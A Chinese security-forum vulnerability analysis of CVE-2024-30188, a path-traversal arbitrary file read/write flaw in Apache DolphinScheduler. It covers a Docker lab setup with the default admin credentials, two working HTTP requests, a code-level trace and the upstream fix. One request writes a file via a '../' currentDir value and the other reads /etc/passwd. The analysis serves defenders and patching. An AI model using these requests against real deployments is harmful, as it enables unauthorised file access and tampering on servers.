问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
CVE-2024-30188 Apache DolphinScheduler 任意文件读写漏洞分析
漏洞分析
Apache Dolphinscheduler 是开源的分布式任务调度系统。受影响版本中,由于资源管理功能未对 currentDir 参数进行有效校验,经过身份验证的攻击者可以通过构造恶意的路径参数,绕过目录限制在服务器端读取或写入任意文件。
前言 -- Apache Dolphinscheduler 是开源的分布式任务调度系统。受影响版本中,由于资源管理功能未对 currentDir 参数进行有效校验,经过身份验证的攻击者可以通过构造恶意的路径参数,绕过目录限制在服务器端读取或写入任意文件。 漏洞影响版本:3.1.0 =< Apache Dolphinscheduler < 3.2.2 环境搭建 ---- 下载3.2.0版本<https://codeload.github.com/apache/dolphinscheduler/zip/refs/heads/3.2.0-release> 修改deploy/docker/docker-compose.yml,在dolphinscheduler-api服务添加调试语句 ```yml command: /opt/java/openjdk/bin/java -server -Xms1g -Xmx1g -Xmn512m -XX:+IgnoreUnrecognizedVMOptions -XX:+PrintGCDateStamps -XX:+PrintGCDetails -Xloggc:gc.log -XX:+HeapDumpOnOutOfMemoryError -XX:HeapDumpPath=dump.hprof -XX:-UseContainerSupport -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005 -cp /opt/dolphinscheduler/conf:/opt/dolphinscheduler/libs/* org.apache.dolphinscheduler.api.ApiApplicationServer ``` data:image/s3,"s3://crabby-images/e4090/e4090624321178e7887f4af232c2859bb85d536e" alt="image-20240823120332919.png" 启动服务 ```sh docker-compose --profile all up -d ``` 访问<http://127.0.0.1:12345/dolphinscheduler/ui/login> 正常说明搭建成功,默认账号密码为admin/dolphinscheduler123 漏洞复现 ---- ### 文件上传 漏洞触发需要一个用户账户登录到后台 data:image/s3,"s3://crabby-images/2aac3/2aac39c5da6e79a1e660c51e07a8dae272c29301" alt="image-20240823143612389.png" ```php POST /dolphinscheduler/resources/online-create HTTP/1.1 Host: 192.168.85.129:12345 Content-Type: application/x-www-form-urlencoded Cookie: securityConfigType=PASSWORD; sessionId=a4a04aa2-7baa-478b-abcb-476c13af0d62; language=zh_CN; sessionId=a4a04aa2-7baa-478b-abcb-476c13af0d62 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 pid=-1&type=FILE&suffix=sh&fileName=test1&description=&content=123123¤tDir=file:/dolphinscheduler/default/resources/../../../ ``` ### 文件下载 data:image/s3,"s3://crabby-images/59f72/59f72efdbd23a98962c6ea43246456dc6ad23735" alt="image-20240823144924340.png" ```php GET /dolphinscheduler/resources/download?fullName=/etc/passwd HTTP/1.1 Host: 192.168.85.129:12345 ``` 分析过程 ---- ### 文件上传 漏洞触发点在api.Controller.ResourcesController#onlineCreateResource(),访问dolphinscheduler/resources/online-create接口就会调用该方法 data:image/s3,"s3://crabby-images/dbddf/dbddf4da132a2788e6b8559038ff7e6afdd92e98" alt="image-20240823120857241.png" 首先会判断是否登录,没登陆的话会直接返回 data:image/s3,"s3://crabby-images/ebf31/ebf314a4f4c20c78c2a4d9bf017bb5289b23a8e8" alt="image-20240823121823695.png" 继续向下执行,程序会判断currentDir是否包含"file:/dolphinscheduler/default/resources/"字符串,currentDIr是可控的,就可以构造currentDir=file:/dolphinscheduler/default/resources/../../../ 接着将currentDir和文件名name拼接得到fullName data:image/s3,"s3://crabby-images/be882/be882c394c02fab974b5ffe6e1dbb3080aacb70e" alt="image-20240823141708619.png" 接着进入uploadContentToStorage(),首先会将content的内容写入到本地临时文件localFilename中,接着在下面调用storageOperate.upload() data:image/s3,"s3://crabby-images/1e9ef/1e9ef179543a7984f702f5ca4e21b6e4edeef215" alt="image-20240823141933409.png" data:image/s3,"s3://crabby-images/92022/92022a9552c0b297a625b39f292d426646b74e04" alt="image-20240823142119052.png" 最终会进入到plugin.storage.hdfs#copyLocalToHdfs(),将临时文件srcPath复制到dstPath,实现了目录跨越上传 data:image/s3,"s3://crabby-images/6776b/6776b3612c55341527ea1cbca99d214ddd24d977" alt="image-20240823142246217.png" 进入到api容器中,可以在根目录下看到上传的文件test1.sh data:image/s3,"s3://crabby-images/dc9ee/dc9ee02b8ce32b36f6393947c75e7e58c40b84f6" alt="image-20240825195011594.png" ### 文件下载 任意文件下载的方法在api.Controller.ResourcesController#downloadResource() data:image/s3,"s3://crabby-images/241c4/241c4de9a2ba89caf6196bdd85d7d2d02177b9c4" alt="image-20240823144104616.png" 跟进到api.service.impl.ResourcesServiceImpl#downloadResource() 1、在该方法里会将fullName以"/"为分隔符划分得到aliasArr数组,拼接数组最后一个字符串到本地临时文件localFileName中 2、调用storageOperate.download()将fullName文件内容复制到临时文件localFileName中 3、调用file2Resource()返回localFileName的文件对象 data:image/s3,"s3://crabby-images/22da0/22da0cb2e70090fbf69c895d8aac44f0a73c00ab" alt="image-20240823144320197.png" 漏洞修复 ---- <https://github.com/apache/dolphinscheduler/compare/3.2.0...3.2.2> 可以在看到3.2.2修复版本中添加了一个函数checkFullName()用来验证fullName,如果包含../就会抛出异常 data:image/s3,"s3://crabby-images/d2be1/d2be18305e355601bf78c211c785ea1ea321b14b" alt="image-20240825194324425.png"
发表于 2024-08-30 08:00:02
阅读 ( 6732 )
分类:
Web应用
0 推荐
收藏
0 条评论
请先
登录
后评论
kakakakaxi
7 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!